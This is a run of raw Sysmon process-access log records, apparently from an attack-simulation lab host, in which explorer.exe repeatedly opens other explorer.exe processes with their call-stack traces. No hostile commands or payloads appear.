16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241689Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241688Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241687Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241686Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241685Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241684Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241683Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241682Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241681Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241680Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241679Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241678Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241677Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241676Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241675Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241674Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241673Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241672Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241671Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241670Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241669Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 